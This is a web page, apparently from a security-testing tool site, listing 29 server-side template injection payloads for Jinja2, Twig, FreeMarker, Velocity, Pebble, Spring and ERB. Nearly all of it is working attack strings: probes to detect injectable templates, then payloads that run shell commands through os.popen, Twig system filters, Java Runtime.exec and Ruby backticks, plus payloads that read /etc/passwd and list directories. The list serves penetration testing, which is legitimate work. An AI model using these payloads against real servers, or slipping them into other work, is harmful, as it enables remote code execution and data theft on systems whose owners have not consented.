SSTI Cheat Sheet

Server-Side Template Injection payloads for Jinja2, Twig, FreeMarker, ERB, and more template engines. (29 payloads)

Detection

(10)

{{7*7}}

Jinja2 / Twig / Pebble — expect 49

${7*7}

FreeMarker / Mako — expect 49

<%= 7*7 %>

ERB (Ruby) — expect 49

#{7*7}

Generic expression test

#set($x=7*7)$x

Velocity — expect 49

{{7*'7'}}

Jinja2 vs Twig (Jinja2: 7777777, Twig: 49)

{{dump(app)}}

Twig — dump application object

{{config}}

Jinja2/Flask — dump config

${T(java.lang.Runtime)}

Spring Expression Language (SpEL)

*{7*7}

Thymeleaf — expect 49

Jinja2 / Flask RCE

(6)

{{config.__class__.__init__.__globals__['os'].popen('id').read()}}

RCE via config globals

{{''.__class__.__mro__[1].__subclasses__()}}

List all subclasses

{{''.__class__.__mro__[1].__subclasses__()[X]('id',shell=True,stdout=-1).communicate()}}

Popen via subclass index X

{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}

RCE via request object

{{cycler.__init__.__globals__.os.popen('id').read()}}

RCE via cycler object

{{lipsum.__globals__.os.popen('id').read()}}

RCE via lipsum

Twig RCE

(4)

{{['id']|filter('system')}}

RCE via filter function

{{['id']|map('system')}}

RCE via map function

{{_self.env.registerUndefinedFilterCallback('exec')}}{{_self.env.getFilter('id')}}

Twig < 1.20 registerCallback RCE

{{'id'|filter('system')}}

Direct string filter RCE

FreeMarker / Velocity / Java

(4)

<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}

FreeMarker Execute classFreeMarker

${T(java.lang.Runtime).getRuntime().exec("id")}

Spring Expression Language (SpEL)Spring

#set($rt=$x.class.forName("java.lang.Runtime"))#set($ex=$rt.getRuntime().exec("id"))

Velocity Runtime.execVelocity

${product.getClass().forName("java.lang.Runtime").getRuntime().exec("id")}

Pebble Java execPebble

ERB / Ruby

(5)

<%= `id` %>

Backtick command execution

<%= system("id") %>

System call

<%= IO.popen("id").read %>

IO.popen execution

<%= File.read("/etc/passwd") %>

Read file

<%= Dir.entries("/") %>

List directory

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Generators

Template Injection (SSTI)WAF Bypass

Related Cheat Sheets

XSS Cheat Sheet Command Injection Cheat Sheet

$loading...